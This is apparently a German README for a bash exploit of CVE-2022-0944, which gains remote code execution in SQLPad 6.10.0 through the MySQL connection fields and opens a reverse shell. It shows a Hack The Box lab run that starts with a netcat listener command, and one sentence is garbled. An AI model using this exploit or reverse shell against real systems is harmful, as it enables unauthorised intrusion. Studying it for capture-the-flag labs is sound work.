
Refurbish
Dieses Bash-Skript nutzt eine RCE-Sicherheitslücke in SQLPad 6.10.0 aus, die es einem Angreifer ermöglicht, Remote Code Execution (RCE) zu erlangen, indem die Felder host und database in den MySQL-Datenbankverbindungseinstellungen von SQLPad missbraucht werden. Der Exploit nutzt SQLPads nicht bereinigte Handhabung des child_process-Moduls in Node.js aus, um beliebige Befehle auszuführen, was letztendlich eine Reverse-Shell auf dem Rechner des Angreifers öffnet.
nc -lvnp 9001 aktiv ist.┌──(kali㉿kali)-[~/HTB/machines/sightless]
└─$ ./CVE-2022-0944
Please make sure to start a listener on your attacking machine using the command:
nc -lvnp 9001
Waiting for you to set up the listener...
Press [Enter] when you are ready...
Please provide the target host (e.g., x.x.com):
x.example.com
Please provide your IP address (e.g., 10.10.16.3):
0.0.0.0
Exploit sent. If everything went well, check your listener for a connection on port 9001.
Dieser Code dient ausschließlich zu Bildungszwecken. Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie diesen Exploit nur mit Erlaubnis.